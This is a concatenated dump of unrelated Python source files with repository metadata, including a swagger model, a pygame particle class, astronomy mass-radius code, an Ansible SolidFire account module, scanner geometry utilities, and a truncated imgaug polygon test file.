if key == "queue_usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `queue_usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "read_bytes_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `read_bytes_per_sec`, must be a value greater than or equal to `0`")
if key == "reads_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `reads_per_sec`, must be a value greater than or equal to `0`")
if key == "san_usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `san_usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "san_usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `san_usec_per_read_op`, must be a value greater than or equal to `0`")
if key == "san_usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `san_usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "service_usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `service_usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "service_usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `service_usec_per_read_op`, must be a value greater than or equal to `0`")
if key == "service_usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `service_usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "usec_per_mirrored_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `usec_per_mirrored_write_op`, must be a value greater than or equal to `0`")
if key == "usec_per_read_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `usec_per_read_op`, must be a value greater than or equal to `0`")
if key == "usec_per_write_op" and value is not None:
if value < 0:
raise ValueError("Invalid value for `usec_per_write_op`, must be a value greater than or equal to `0`")
if key == "write_bytes_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `write_bytes_per_sec`, must be a value greater than or equal to `0`")
if key == "writes_per_sec" and value is not None:
if value < 0:
raise ValueError("Invalid value for `writes_per_sec`, must be a value greater than or equal to `0`")
if key == "service_usec_per_read_op_cache_reduction" and value is not None:
if value > 1.0:
raise ValueError("Invalid value for `service_usec_per_read_op_cache_reduction`, value must be less than or equal to `1.0`")
if value < 0.0:
raise ValueError("Invalid value for `service_usec_per_read_op_cache_reduction`, must be a value greater than or equal to `0.0`")
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(HostGroupPerformanceByArray, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, HostGroupPerformanceByArray):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 56.625683 | 294 | 0.664608 |
b9691245e0dd71130bb6f8e67087d8965c651bf5 | 159 | py | Python | coincident_event_finder/__init__.py | noahhdf/fact-magic-coincident-events | fcac6ab733961f6dda1ceac6406cbe2c0d4d8e45 | [
"MIT"
] | null | null | null | coincident_event_finder/__init__.py | noahhdf/fact-magic-coincident-events | fcac6ab733961f6dda1ceac6406cbe2c0d4d8e45 | [
"MIT"
] | null | null | null | coincident_event_finder/__init__.py | noahhdf/fact-magic-coincident-events | fcac6ab733961f6dda1ceac6406cbe2c0d4d8e45 | [
"MIT"
] | null | null | null | from .coincidents import coincident_indices, coincidents
from .eventmerge import merge_events
__all__ = ["coincidents", "coincident_indices", "merge_events"]
| 31.8 | 63 | 0.81761 |
d5341972ab17ea0b515acce184da51b83827935e | 849 | py | Python | src/plugins/PlatPyGame/code/particles.py | StryQ1/Project-Acturus-X | e1d928eb751befcfd2ad9f1cf50a32749f97b23c | [
"Apache-2.0"
] | 3 | 2022-03-21T07:40:24.000Z | 2022-03-21T11:16:43.000Z | src/plugins/PlatPyGame/code/particles.py | StryQ1/Project-Acturus-X | e1d928eb751befcfd2ad9f1cf50a32749f97b23c | [
"Apache-2.0"
] | null | null | null | src/plugins/PlatPyGame/code/particles.py | StryQ1/Project-Acturus-X | e1d928eb751befcfd2ad9f1cf50a32749f97b23c | [
"Apache-2.0"
] | null | null | null | import pygame
from support import import_folder
class ParticleEffect(pygame.sprite.Sprite):
def __init__(self,pos,type):
super().__init__()
self.frame_index = 0
self.animation_speed = 0.5
if type == 'jump':
self.frames = import_folder('../graphics/character/dust_particles/jump')
if type == 'land':
self.frames = import_folder('../graphics/character/dust_particles/land')
if type == 'explosion':
self.frames = import_folder('../graphics/enemy/explosion')
self.image = self.frames[self.frame_index]
self.rect = self.image.get_rect(center = pos)
def animate(self):
self.frame_index += self.animation_speed
if self.frame_index >= len(self.frames):
self.kill()
else:
self.image = self.frames[int(self.frame_index)]
def update(self,x_shift):
self.animate()
self.rect.x += x_shift
| 30.321429 | 76 | 0.693757 |
cab803326f28cbc64ccfcd4daed9758b6b6e9f78 | 6,316 | py | Python | peerless/mr.py | dfm/single-transits | 311aae377d756b427cef14974a5915553696c7ab | [
"MIT"
] | null | null | null | peerless/mr.py | dfm/single-transits | 311aae377d756b427cef14974a5915553696c7ab | [
"MIT"
] | null | null | null | peerless/mr.py | dfm/single-transits | 311aae377d756b427cef14974a5915553696c7ab | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import division, print_function
import h5py
import logging
import numpy as np
from .catalogs import Catalog, LocalCatalog, singleton
__all__ = ["WolfgangMRRelation"]
class WolfgangMRRelation(LocalCatalog):
filename = "wolfgang.csv"
def predict_mass(self, radius_samples, num_mass=None, maxiter=500):
radius_samples = np.atleast_1d(radius_samples)
shape = radius_samples.shape
flat_radii = radius_samples.flatten()
params = self.df
inds = np.ones(len(params), dtype=bool)
if num_mass is not None:
inds = np.random.randint(len(params), size=num_mass)
# Grab the parameter samples.
lnc = np.array(params["normconst"])[inds]
gamma = np.array(params["powindex"])[inds]
sigm = np.sqrt(np.array(params["varMR"]))[inds]
# Use Wolfgang+ (2016) Equation (2).
mu = lnc[:, None] + gamma[:, None] * np.log(flat_radii)[None, :]
std = sigm[:, None] + np.zeros_like(mu)
mass = np.exp(mu) + std * np.random.randn(*(mu.shape))
# Iterate until none of the masses are < 0.0.
for i in range(maxiter):
m = mass < 0.0
if not np.any(m):
break
mass[m] = np.exp(mu[m]) + std[m] * np.random.randn(m.sum())
if i == maxiter - 1:
logging.warn("Some masses still incorrect after 'maxiter'")
# For R > 9 R_E, use a log-normal distribution.
mask = flat_radii > 9.0
lnm = 0.04590711 + 0.3919828*np.random.randn(len(mass), mask.sum())
mass[:, mask] = np.exp(lnm + np.log(317.828))
# Reshape the samples into the correct (num_mass, ...) shape.
final_shape = [len(lnc)] + list(shape)
return mass.reshape(final_shape)
class ChenMRRelation(Catalog):
url = ("https://github.com/chenjj2/forecaster/blob/master/"
"fitting_parameters.h5?raw=true")
name = "chen"
_grid = None
def _save_fetched_file(self, file_handle):
with open(self.filename, "wb") as f:
f.write(file_handle.read())
with h5py.File(self.filename, "r") as f:
log_r, log_m, grid = self.make_grid(f["hyper_posterior"][...])
with h5py.File(self.filename, "w") as f:
f.create_dataset("log10_radius_bins", data=log_r)
f.create_dataset("log10_mass_bins", data=log_m)
f.create_dataset("cumulative_probability", data=grid)
def make_grid(self, samples):
"""
Convert the model from Chen & Kipping to ``p(log(M) | log(R))``
The idea here is their model gives ``p(log(R) | log(M)) =
N(mu(M), std(M))`` and, by the chain rule, we can compute
``p(log(M) | log(R)) = p(log(R) | log(M)) * p(log(M)) / p(log(R))``.
If we assume a flat prior in ``log(M)``, we can numerically compute
the required probability distribution on a grid.
"""
log_mass = np.linspace(np.log10(1e-4), np.log10(1e6), 800)
log_radius = np.linspace(np.log10(0.1), np.log10(100.0), 901)
# Get the parameters into the correct shape.
npop = (samples.shape[-1] - 1) // 3 + 1
slope = samples[:, 1:1+npop]
sigma = samples[:, 1+npop:1+2*npop]
split = samples[:, 1+2*npop:3*npop]
const = np.empty_like(slope)
const[:, 0] = samples[:, 0]
for i in range(1, npop):
delta = slope[:, i-1] - slope[:, i]
const[:, i] = const[:, i-1] + split[:, i-1] * delta
grid = -np.inf + np.zeros((len(log_radius), len(log_mass)))
dm = log_mass[1] - log_mass[0]
print("Computing grid -- this might take a minute...")
for i in np.random.randint(0, len(samples), 2048):
log_mass_bins = np.concatenate(([log_mass[0]-dm],
split[i],
[log_mass[-1]+dm]))
inds = np.digitize(log_mass, log_mass_bins) - 1
mu = log_mass * slope[i, inds] + const[i, inds]
std = sigma[i, inds]
log_pred = -0.5 * ((log_radius[:, None]-mu)/std)**2
log_pred -= np.log(std)
grid = np.logaddexp(grid, log_pred)
# Normalize the grid as p(log M | log R)
grid = np.cumsum(np.exp(grid), axis=1)
grid /= grid[:, -1][:, None]
dr = log_radius[1] - log_radius[0]
log_mass_bins = np.append(log_mass[0]-0.5*dr, log_mass+0.5*dr)
log_radius_bins = np.append(log_radius[0]-0.5*dr, log_radius+0.5*dr)
return log_radius_bins, log_mass_bins, grid
def open(self):
return h5py.File(self.filename, "r")
@property
def grid(self):
if self._grid is None:
self.fetch()
with h5py.File(self.filename, "r") as f:
self._grid = dict(
log10_radius_bins=f["log10_radius_bins"][...],
log10_mass_bins=f["log10_mass_bins"][...],
cumulative_probability=f["cumulative_probability"][...],
)
return self._grid
def predict_mass(self, radius_samples, num_mass=10000):
radius_samples = np.atleast_1d(radius_samples)
shape = radius_samples.shape
flat_log_r = np.log10(radius_samples.flatten())
g = self.grid
log_r = g["log10_radius_bins"]
log_m = g["log10_mass_bins"]
grid = g["cumulative_probability"]
r_inds = np.digitize(flat_log_r, log_r) - 1
if np.any(r_inds < 0) or np.any(r_inds >= len(log_r) - 1):
logging.warn("Radii outside of grid")
r_inds[r_inds < 0] = 0
r_inds[r_inds >= len(log_r) - 1] = len(log_r) - 2
# Sample the masses.
cp = grid[r_inds]
mass = np.empty((num_mass, len(cp)))
dm = log_m[1] - log_m[0]
for i, c in enumerate(cp):
u = np.random.rand(num_mass)
j = np.digitize(u, c) - 1
mass[:, i] = 10**(log_m[j] + dm * np.random.rand(num_mass))
# Reshape the samples into the correct (num_mass, ...) shape.
final_shape = [num_mass] + list(shape)
return mass.reshape(final_shape)
WolfgangMRRelation = singleton(WolfgangMRRelation)
ChenMRRelation = singleton(ChenMRRelation)
| 37.595238 | 76 | 0.566498 |
bc1b77b8ef0c5a936be1ba6959355645a1ed08ee | 4,115 | py | Python | lib/utils.py | jzx-gooner/Structured-Light-Scanner | a5762e193ef040e1d88393c390c3afa1be43b175 | [
"MIT"
] | 6 | 2021-11-11T02:32:55.000Z | 2022-02-28T12:38:54.000Z | lib/utils.py | jzx-gooner/Structured-Light-Scanner | a5762e193ef040e1d88393c390c3afa1be43b175 | [
"MIT"
] | null | null | null | lib/utils.py | jzx-gooner/Structured-Light-Scanner | a5762e193ef040e1d88393c390c3afa1be43b175 | [
"MIT"
] | null | null | null | from dataclasses import dataclass
from typing import Optional
import cv2
import numpy as np
import open3d as o3d
@dataclass(frozen=True)
class Plane:
origin: np.ndarray
normal: np.ndarray
R: Optional[np.ndarray] = None
@dataclass(frozen=True)
class Point:
x: int
y: int
@dataclass(frozen=True)
class Rectangle:
top_left: Point
bottom_right: Point
@dataclass(frozen=True)
class ExtremePoints:
wall: Rectangle
desk: Rectangle
def draw_circles(image, points, text=False,color=(50, 50, 255)):
"""
Given an image, draw colored circles on each point
specified in `points`.
If text is True, each corner is also tagged with an increasing number.
"""
for i, point in enumerate(points):
p = tuple([int(i) for i in point[0]])
cv2.circle(image, p, 4, color, -1)
if text:
cv2.putText(
image,
text=str(i),
org=p,
fontFace=1,
fontScale=1.5,
color=color,
)
def fit_plane(points):
"""
Fit a plane through a bunch of 3D points.
Return the plane as an (origin, normal) tuple.
"""
mean = np.mean(points, axis=0)
xx = 0
xy = 0
xz = 0
yy = 0
yz = 0
zz = 0
for point in points:
diff = point - mean
xx += diff[0] * diff[0]
xy += diff[0] * diff[1]
xz += diff[0] * diff[2]
yy += diff[1] * diff[1]
yz += diff[1] * diff[2]
zz += diff[2] * diff[2]
det_x = yy * zz - yz * yz
det_y = xx * zz - xz * xz
det_z = xx * yy - xy * xy
det_max = max(det_x, det_y, det_z)
if det_max == det_x:
normal = np.array([det_x, xz * yz - xy * zz, xy * yz - xz * yy])
elif det_max == det_y:
normal = np.array([xz * yz - xy * zz, det_y, xy * xz - yz * xx])
else:
normal = np.array([xy * yz - xz * yy, xy * xz - yz * xx, det_z])
normal = normal / np.linalg.norm(normal)
return Plane(origin=np.array(mean), normal=normal)
def to_binary_image(img):
"""
Given an image, return it as a B/W thresholded image.
"""
img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img_thresholded = cv2.threshold(
img_gray, 100, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU
)[1]
return img_thresholded
def line_plane_intersection(plane_origin, plane_normal, line_direction):
"""
Given a point on a plane, the normal to the plane at that point and a ray in 3D,
find the intersection point between the 3D ray and the 3D plane.
"""
d = np.dot(plane_origin, plane_normal) / np.dot(line_direction, plane_normal)
return line_direction * d
def load_intrinsics(debug=True):
"""
Load the matrix of intrinsic parameters K and the five distortion parameters
from the XML file saved after having performed camera calibration.
"""
intrinsics = cv2.FileStorage("calibration/intrinsics.xml", cv2.FILE_STORAGE_READ)
K = intrinsics.getNode("K").mat()
dist = intrinsics.getNode("dist").mat()
if debug:
print(f"K:\n{K}")
print(f"Distortion parameters:\n{dist}\n\n")
return K, dist
def show_image(img, continuous=False):
"""
Show an image. If continuous is True, the display
is non-breaking and can be closed by hitting Q.
"""
cv2.imshow("Image", img)
if not continuous:
cv2.waitKey(0)
cv2.destroyAllWindows()
return cv2.waitKey(1) & 0xFF == ord("q")
def show_pointcloud(points,colors):
"""
Given points in the 3D world, save the PLY file representing
the point cloud. This function saves both the original file and
a version to which an outlier removal process has been applied.
"""
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(np.vstack(points).astype(np.float64))
pcd.colors = o3d.utility.Vector3dVector(np.vstack(colors))
vis.draw_geometries([pcd])
| 27.804054 | 86 | 0.592467 |
a4f270892fa9061df74cbf985847a5fdf81781a5 | 8,702 | py | Python | ansible/venv/lib/python2.7/site-packages/ansible/modules/storage/netapp/_sf_account_manager.py | gvashchenkolineate/gvashchenkolineate_infra_trytravis | 0fb18850afe0d8609693ba4b23f29c7cda17d97f | [
"MIT"
] | 17 | 2017-06-07T23:15:01.000Z | 2021-08-30T14:32:36.000Z | ansible/ansible/modules/storage/netapp/_sf_account_manager.py | SergeyCherepanov/ansible | 875711cd2fd6b783c812241c2ed7a954bf6f670f | [
"MIT"
] | 9 | 2017-06-25T03:31:52.000Z | 2021-05-17T23:43:12.000Z | ansible/ansible/modules/storage/netapp/_sf_account_manager.py | SergeyCherepanov/ansible | 875711cd2fd6b783c812241c2ed7a954bf6f670f | [
"MIT"
] | 3 | 2018-05-26T21:31:22.000Z | 2019-09-28T17:00:45.000Z | #!/usr/bin/python
# (c) 2017, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: sf_account_manager
deprecated:
removed_in: "2.11"
why: This Module has been replaced
alternative: please use M(na_elementsw_account)
short_description: Manage SolidFire accounts
extends_documentation_fragment:
- netapp.solidfire
version_added: '2.3'
author: Sumit Kumar (@timuster) <sumit4@netapp.com>
description:
- Create, destroy, or update accounts on SolidFire
options:
state:
description:
- Whether the specified account should exist or not.
required: true
choices: ['present', 'absent']
name:
description:
- Unique username for this account. (May be 1 to 64 characters in length).
required: true
new_name:
description:
- New name for the user account.
initiator_secret:
description:
- CHAP secret to use for the initiator. Should be 12-16 characters long and impenetrable.
- The CHAP initiator secrets must be unique and cannot be the same as the target CHAP secret.
- If not specified, a random secret is created.
target_secret:
description:
- CHAP secret to use for the target (mutual CHAP authentication).
- Should be 12-16 characters long and impenetrable.
- The CHAP target secrets must be unique and cannot be the same as the initiator CHAP secret.
- If not specified, a random secret is created.
attributes:
description: List of Name/Value pairs in JSON object format.
account_id:
description:
- The ID of the account to manage or update.
status:
description:
- Status of the account.
'''
EXAMPLES = """
- name: Create Account
sf_account_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: present
name: TenantA
- name: Modify Account
sf_account_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: present
name: TenantA
new_name: TenantA-Renamed
- name: Delete Account
sf_account_manager:
hostname: "{{ solidfire_hostname }}"
username: "{{ solidfire_username }}"
password: "{{ solidfire_password }}"
state: absent
name: TenantA-Renamed
"""
RETURN = """
"""
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
import ansible.module_utils.netapp as netapp_utils
HAS_SF_SDK = netapp_utils.has_sf_sdk()
class SolidFireAccount(object):
def __init__(self):
self.argument_spec = netapp_utils.ontap_sf_host_argument_spec()
self.argument_spec.update(dict(
state=dict(required=True, choices=['present', 'absent']),
name=dict(required=True, type='str'),
account_id=dict(required=False, type='int', default=None),
new_name=dict(required=False, type='str', default=None),
initiator_secret=dict(required=False, type='str'),
target_secret=dict(required=False, type='str'),
attributes=dict(required=False, type='dict'),
status=dict(required=False, type='str'),
))
self.module = AnsibleModule(
argument_spec=self.argument_spec,
supports_check_mode=True
)
p = self.module.params
# set up state variables
self.state = p['state']
self.name = p['name']
self.account_id = p['account_id']
self.new_name = p['new_name']
self.initiator_secret = p['initiator_secret']
self.target_secret = p['target_secret']
self.attributes = p['attributes']
self.status = p['status']
if HAS_SF_SDK is False:
self.module.fail_json(msg="Unable to import the SolidFire Python SDK")
else:
self.sfe = netapp_utils.create_sf_connection(module=self.module)
def get_account(self):
"""
Return account object if found
:return: Details about the account. None if not found.
:rtype: dict
"""
account_list = self.sfe.list_accounts()
for account in account_list.accounts:
if account.username == self.name:
# Update self.account_id:
if self.account_id is not None:
if account.account_id == self.account_id:
return account
else:
self.account_id = account.account_id
return account
return None
def create_account(self):
try:
self.sfe.add_account(username=self.name,
initiator_secret=self.initiator_secret,
target_secret=self.target_secret,
attributes=self.attributes)
except Exception as e:
self.module.fail_json(msg='Error creating account %s: %s)' % (self.name, to_native(e)),
exception=traceback.format_exc())
def delete_account(self):
try:
self.sfe.remove_account(account_id=self.account_id)
except Exception as e:
self.module.fail_json(msg='Error deleting account %s: %s' % (self.account_id, to_native(e)),
exception=traceback.format_exc())
def update_account(self):
try:
self.sfe.modify_account(account_id=self.account_id,
username=self.new_name,
status=self.status,
initiator_secret=self.initiator_secret,
target_secret=self.target_secret,
attributes=self.attributes)
except Exception as e:
self.module.fail_json(msg='Error updating account %s: %s' % (self.account_id, to_native(e)),
exception=traceback.format_exc())
def apply(self):
changed = False
account_exists = False
update_account = False
account_detail = self.get_account()
if account_detail:
account_exists = True
if self.state == 'absent':
changed = True
elif self.state == 'present':
# Check if we need to update the account
if account_detail.username is not None and self.new_name is not None and \
account_detail.username != self.new_name:
update_account = True
changed = True
elif account_detail.status is not None and self.status is not None \
and account_detail.status != self.status:
update_account = True
changed = True
elif account_detail.initiator_secret is not None and self.initiator_secret is not None \
and account_detail.initiator_secret != self.initiator_secret:
update_account = True
changed = True
elif account_detail.target_secret is not None and self.target_secret is not None \
and account_detail.target_secret != self.target_secret:
update_account = True
changed = True
elif account_detail.attributes is not None and self.attributes is not None \
and account_detail.attributes != self.attributes:
update_account = True
changed = True
else:
if self.state == 'present':
changed = True
if changed:
if self.module.check_mode:
pass
else:
if self.state == 'present':
if not account_exists:
self.create_account()
elif update_account:
self.update_account()
elif self.state == 'absent':
self.delete_account()
self.module.exit_json(changed=changed)
def main():
v = SolidFireAccount()
v.apply()
if __name__ == '__main__':
main()
| 32.349442 | 104 | 0.585383 |
eb9b7d3ca7dca39d3125958ddfd4192eb81a07f6 | 98,752 | py | Python | test/augmentables/test_polys.py | Gokkulnath/imgaug | d66b76177eb95eca767d70ab2be813fea7cd9000 | [
"MIT"
] | 1 | 2019-04-01T11:16:16.000Z | 2019-04-01T11:16:16.000Z | test/augmentables/test_polys.py | Gokkulnath/imgaug | d66b76177eb95eca767d70ab2be813fea7cd9000 | [
"MIT"
] | null | null | null | test/augmentables/test_polys.py | Gokkulnath/imgaug | d66b76177eb95eca767d70ab2be813fea7cd9000 | [
"MIT"
] | 1 | 2020-01-21T15:28:38.000Z | 2020-01-21T15:28:38.000Z | from __future__ import print_function, division, absolute_import
import time
import warnings
import sys
# unittest only added in 3.4 self.subTest()
if sys.version_info[0] < 3 or sys.version_info[1] < 4:
import unittest2 as unittest
else:
import unittest
# unittest.mock is not available in 2.7 (though unittest2 might contain it?)
try:
import unittest.mock as mock
except ImportError:
import mock
import matplotlib
matplotlib.use('Agg') # fix execution of tests involving matplotlib on travis
import numpy as np
import six.moves as sm
import shapely
import shapely.geometry
import imgaug as ia
from imgaug.testutils import reseed
from imgaug.augmentables.polys import (
_convert_points_to_shapely_line_string, _interpolate_point_pair, _interpolate_point_pair,
_interpolate_points, _interpolate_points_by_max_distance,
_ConcavePolygonRecoverer
)
def main():
    """Run every polygon-related test function once, in order."""
    test_functions = (
        test_Polygon___init__,
        test_Polygon_xx,
        test_Polygon_yy,
        test_Polygon_xx_int,
        test_Polygon_yy_int,
        test_Polygon_is_valid,
        test_Polygon_area,
        test_Polygon_height,
        test_Polygon_width,
        test_Polygon_project,
        test_Polygon_find_closest_point_idx,
        test_Polygon__compute_inside_image_point_mask,
        test_Polygon_is_fully_within_image,
        test_Polygon_is_partly_within_image,
        test_Polygon_is_out_of_image,
        test_Polygon_cut_out_of_image,
        test_Polygon_clip_out_of_image,
        test_Polygon_shift,
        test_Polygon_draw_on_image,
        test_Polygon_extract_from_image,
        test_Polygon_to_shapely_polygon,
        test_Polygon_to_bounding_box,
        test_Polygon_from_shapely,
        test_Polygon_copy,
        test_Polygon_deepcopy,
        test_Polygon___repr__,
        test_Polygon___str__,
        test___convert_points_to_shapely_line_string,
        test__interpolate_point_pair,
        test__interpolate_points,
        test__interpolate_points_by_max_distance,
    )
    for test_function in test_functions:
        test_function()
def test_Polygon___init__():
    """Test the Polygon constructor for various exterior input formats.

    Covers: lists of Keypoints, lists of float/int tuples, (N,2) ndarrays
    in float32 and float64, empty exteriors, a bad array shape (expected to
    raise) and the optional ``label`` argument. In all accepted cases the
    exterior must be stored as a float32 (N,2) array.
    """
    # exterior is list of Keypoint
    poly = ia.Polygon([ia.Keypoint(x=0, y=0), ia.Keypoint(x=1, y=1), ia.Keypoint(x=0.5, y=2.5)])
    assert poly.exterior.dtype.type == np.float32
    assert np.allclose(
        poly.exterior,
        np.float32([
            [0.0, 0.0],
            [1.0, 1.0],
            [0.5, 2.5]
        ])
    )

    # exterior is list of tuple of floats
    poly = ia.Polygon([(0.0, 0.0), (1.0, 1.0), (0.5, 2.5)])
    assert poly.exterior.dtype.type == np.float32
    assert np.allclose(
        poly.exterior,
        np.float32([
            [0.0, 0.0],
            [1.0, 1.0],
            [0.5, 2.5]
        ])
    )

    # exterior is list of tuple of integer
    poly = ia.Polygon([(0, 0), (1, 1), (1, 3)])
    assert poly.exterior.dtype.type == np.float32
    assert np.allclose(
        poly.exterior,
        np.float32([
            [0.0, 0.0],
            [1.0, 1.0],
            [1.0, 3.0]
        ])
    )

    # exterior is (N,2) ndarray
    poly = ia.Polygon(
        np.float32([
            [0.0, 0.0],
            [1.0, 1.0],
            [0.5, 2.5]
        ])
    )
    assert poly.exterior.dtype.type == np.float32
    assert np.allclose(
        poly.exterior,
        np.float32([
            [0.0, 0.0],
            [1.0, 1.0],
            [0.5, 2.5]
        ])
    )

    # exterior is (N,2) ndarray in float64 -- must be converted to float32
    poly = ia.Polygon(
        np.float64([
            [0.0, 0.0],
            [1.0, 1.0],
            [0.5, 2.5]
        ])
    )
    assert poly.exterior.dtype.type == np.float32
    assert np.allclose(
        poly.exterior,
        np.float32([
            [0.0, 0.0],
            [1.0, 1.0],
            [0.5, 2.5]
        ])
    )

    # arrays without points -- still float32 with shape (0, 2)
    poly = ia.Polygon([])
    assert poly.exterior.dtype.type == np.float32
    assert poly.exterior.shape == (0, 2)

    poly = ia.Polygon(np.zeros((0, 2), dtype=np.float32))
    assert poly.exterior.dtype.type == np.float32
    assert poly.exterior.shape == (0, 2)

    # bad array shape -- a 1D array is not a valid exterior and must raise.
    # Catch only Exception (not a bare `except:`) so KeyboardInterrupt and
    # SystemExit are not silently swallowed.
    got_exception = False
    try:
        _ = ia.Polygon(np.zeros((8,), dtype=np.float32))
    except Exception:
        got_exception = True
    assert got_exception

    # label defaults to None and is stored verbatim when given
    poly = ia.Polygon([(0, 0)])
    assert poly.label is None
    poly = ia.Polygon([(0, 0)], label="test")
    assert poly.label == "test"
def test_Polygon_xx():
    """``xx`` exposes the exterior x-coordinates as a float32 vector."""
    poly = ia.Polygon([(0, 0), (1, 0), (1.5, 0), (4.1, 1), (2.9, 2.0)])
    expected_xx = np.float32([0.0, 1.0, 1.5, 4.1, 2.9])
    assert poly.xx.dtype.type == np.float32
    assert np.allclose(poly.xx, expected_xx)

    # empty polygon: still float32, zero-length
    empty_poly = ia.Polygon([])
    assert empty_poly.xx.dtype.type == np.float32
    assert empty_poly.xx.shape == (0,)
def test_Polygon_yy():
    """``yy`` exposes the exterior y-coordinates as a float32 vector."""
    poly = ia.Polygon([(0, 0), (0, 1), (0, 1.5), (1, 4.1), (2.0, 2.9)])
    expected_yy = np.float32([0.0, 1.0, 1.5, 4.1, 2.9])
    assert poly.yy.dtype.type == np.float32
    assert np.allclose(poly.yy, expected_yy)

    # empty polygon: still float32, zero-length
    empty_poly = ia.Polygon([])
    assert empty_poly.yy.dtype.type == np.float32
    assert empty_poly.yy.shape == (0,)
def test_Polygon_xx_int():
    """``xx_int`` exposes rounded x-coordinates as an int32 vector."""
    poly = ia.Polygon([(0, 0), (1, 0), (1.5, 0), (4.1, 1), (2.9, 2.0)])
    expected_xx = np.int32([0, 1, 2, 4, 3])  # 1.5 -> 2, 4.1 -> 4, 2.9 -> 3
    assert poly.xx_int.dtype.type == np.int32
    assert np.allclose(poly.xx_int, expected_xx)

    # empty polygon: still int32, zero-length
    empty_poly = ia.Polygon([])
    assert empty_poly.xx_int.dtype.type == np.int32
    assert empty_poly.xx_int.shape == (0,)
def test_Polygon_yy_int():
    """``yy_int`` exposes rounded y-coordinates as an int32 vector."""
    poly = ia.Polygon([(0, 0), (0, 1), (0, 1.5), (1, 4.1), (2.0, 2.9)])
    expected_yy = np.int32([0, 1, 2, 4, 3])  # 1.5 -> 2, 4.1 -> 4, 2.9 -> 3
    assert poly.yy_int.dtype.type == np.int32
    assert np.allclose(poly.yy_int, expected_yy)

    # empty polygon: still int32, zero-length
    empty_poly = ia.Polygon([])
    assert empty_poly.yy_int.dtype.type == np.int32
    assert empty_poly.yy_int.shape == (0,)
def test_Polygon_is_valid():
    """``is_valid`` is True only for well-formed (non-degenerate) exteriors."""
    valid_exteriors = [
        [(0, 0), (1, 0), (1, 1), (0, 1)],             # simple square
        [(0, 0), (1, 0), (1, 0), (1, 1), (0, 1)],     # duplicate point is fine
    ]
    invalid_exteriors = [
        [],                                           # no points at all
        [(0, 0)],                                     # a single point
        [(0, 0), (1, 0)],                             # only two points (a line)
        [(0, 0), (1, 0), (-1, 0.5), (1, 1), (0, 1)],  # self-intersecting
    ]

    for exterior in valid_exteriors:
        assert ia.Polygon(exterior).is_valid
    for exterior in invalid_exteriors:
        assert not ia.Polygon(exterior).is_valid
def test_Polygon_area():
    """Test ``Polygon.area`` for rectangles, a triangle and a degenerate case.

    Uses ``np.allclose(..., atol=1e-8, rtol=0)`` for the float comparisons,
    consistent with the sibling height/width tests (the original used
    hand-rolled ``a - eps < x < a + eps`` chains). A polygon with fewer than
    three points has no area and must raise with a descriptive message.
    """
    # unit square -> area 1
    poly = ia.Polygon([(0, 0), (1, 0), (1, 1), (0, 1)])
    assert np.allclose(poly.area, 1.0, atol=1e-8, rtol=0)

    # 2x1 rectangle -> area 2
    poly = ia.Polygon([(0, 0), (2, 0), (2, 1), (0, 1)])
    assert np.allclose(poly.area, 2.0, atol=1e-8, rtol=0)

    # right triangle -> area 1/2
    poly = ia.Polygon([(0, 0), (1, 1), (0, 1)])
    assert np.allclose(poly.area, 0.5, atol=1e-8, rtol=0)

    # two points only: no area, must raise with a descriptive message
    poly = ia.Polygon([(0, 0), (1, 1)])
    got_exception = False
    try:
        _ = poly.area
    except Exception as exc:
        assert "Cannot compute the polygon's area because" in str(exc)
        got_exception = True
    assert got_exception
def test_Polygon_height():
    """``height`` is the y-extent of the exterior (0 for a single point)."""
    cases = [
        ([(0, 0), (1, 0), (1, 1), (0, 1)], 1.0),  # unit square
        ([(0, 0), (1, 0), (1, 2), (0, 2)], 2.0),  # 1x2 rectangle
        ([(0, 0), (1, 1), (0, 1)], 1.0),          # triangle
        ([(0, 0), (1, 1)], 1.0),                  # line segment
